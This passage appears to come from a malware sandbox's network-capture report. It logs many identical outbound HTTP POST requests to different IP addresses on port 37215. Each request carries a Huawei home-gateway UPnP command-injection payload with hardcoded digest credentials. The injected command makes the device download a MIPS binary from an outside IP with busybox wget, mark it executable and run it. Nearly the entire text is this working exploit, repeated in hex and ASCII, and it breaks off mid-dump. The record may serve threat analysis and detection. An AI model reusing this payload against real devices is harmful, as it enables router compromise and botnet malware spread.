                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1098192.168.2.1348828156.62.253.20037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.735851049 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1099192.168.2.1360712156.246.149.20237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.739983082 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1100192.168.2.1342930197.38.204.20337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.742883921 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1101192.168.2.1342838156.154.24.14537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.746191978 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1102192.168.2.1341248197.46.213.25437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.750464916 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1103192.168.2.1342286197.106.228.20637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.753395081 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1104192.168.2.135731841.100.217.21737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.756561041 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1105192.168.2.133831641.17.44.25137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.759525061 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1106192.168.2.1355410156.90.157.23437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.764386892 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1107192.168.2.1351364197.125.105.2737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.768059015 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 